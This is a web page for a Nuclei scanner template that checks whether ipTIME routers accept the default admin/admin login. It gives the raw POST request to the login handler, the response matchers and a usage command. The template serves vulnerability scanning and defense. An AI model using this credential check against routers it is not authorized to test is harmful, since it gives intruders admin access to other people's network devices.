Skip to content

ipTIME Default Login

ID: iptime-default-login

Severity: high

Author: gy741

Tags: iptime,default-login

ipTIME default admin credentials were discovered.

id: iptime-default-login
info:
name: ipTIME Default Login
author: gy741
severity: high
description: ipTIME default admin credentials were discovered.
reference:
- https://www.freewebtools.com/IPTIME/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
tags: iptime,default-login
http:
- raw:
- |
POST /sess-bin/login_handler.cgi HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/sess-bin/login_session.cgi
username={{username}}&passwd={{password}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "setCookie"
- "efm_session_id"
- "login.cgi"
part: body
condition: and
# digest: 4b0a0048304602210089488ac37f1ca6bf933a8892760a4b7f522510d219fc50e05aebd249991c909a02210083858ee33bef86f89db49496cfa42b6572598d9da358cdffc390b4e745f2343b:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/iptime/iptime-default-login.yaml"

View on Github